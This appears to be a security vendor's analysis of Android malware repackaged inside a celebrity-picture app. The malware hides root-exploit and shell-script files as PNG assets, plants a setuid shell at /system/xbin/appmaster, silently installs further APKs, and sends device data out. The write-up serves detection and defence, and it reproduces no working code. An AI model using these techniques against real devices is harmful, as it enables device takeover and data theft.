The malware binary is packaged with a legitimate application. In this case, the malicious exploit code comes with “Daily Beauties,” which showcases pictures of celebrities that are updated periodically. Attackers use this repacking approach to hide their malware within genuine applications, which users will download and install.

The following image represents the repacking a legit application with malicious code. These repackaged applications are made available in Android black markets and third-party markets.

                          
Figure 1: Repackaged application

This malicious application requires the following user permissions:


Figure 2: User permissions required by the malicious application

From the preceding list of permissions requested by the malicious application, I was curious about two in particular.
  • android.permission.MOUNT_UNMOUNT_FILESYSTEMS
  • android.permission.WRITE_OWNER_DATA

Why would an application that displays pictures of celebrities require permission to write user data and mount/unmount file systems?

Upon opening the malicious application we see the names of celebrities, as shown in the below figure. The victims would see the pictures, but they wouldn’t see the malicious service running in the background.

Figure 3: A picture of the celebrity showcased by the application

So how does the exploit work? The malicious application has four files bundled along with the legit application. They can be found in the asset folder of the application package. The file names appear in Figure 4:


Figure 4: Malicious files in the asset folder of the Android application package

The file gbfm.png carries the exploit code; the others are script/shell files. all four masquerade as PNG image files, although they are originally ELF (gbfm.png, runme.png) and shell script (install.png, installsoft.png) files.

When the required services start, the malicious application renames the .png extension to .sh and executes the exploit as shell script.



Figure 5: Renaming the .png extension to .sh extension

The malicious application first checks for the version of the Android OS and then exploits it:



Figure 6: Malware checks for the Android OS version and executes the exploit

The malware next checks for the Unix user identifier of the currently running process and stores it. Then it triggers the exploit (gbfm.sh). If it’s successful, the malware will elevate the device to the root privilege.

When the device is successfully rooted, it will run the install.sh script, which will set the appropriate file permissions (chmod 4775) to the system partition and copies the shell from the bin folder /system/bin/sh to the folder created by the malicious application /system/xbin/appmaster. Thus the shell can be accessed whenever it wishes and the system partition is remounted.


Figure 7: Setting up the file permissions

After a while, the malware executes the installsoft.sh script, which silently downloads more APK files in the background and installs them by executing the “pm install” command in the root shell.



Figure 8: Installing APK files in the background

The malware retrieves the following information from the compromised device and sends that information to a remote site:



Figure 9: User information retrieved by the malicious file

The exploit will work only when the device has an SD card installed. If not, it will not run. McAfee products detect this malware in our latest DATs as Linux/Exploit-Lotoor.

nb : mcafee Read More...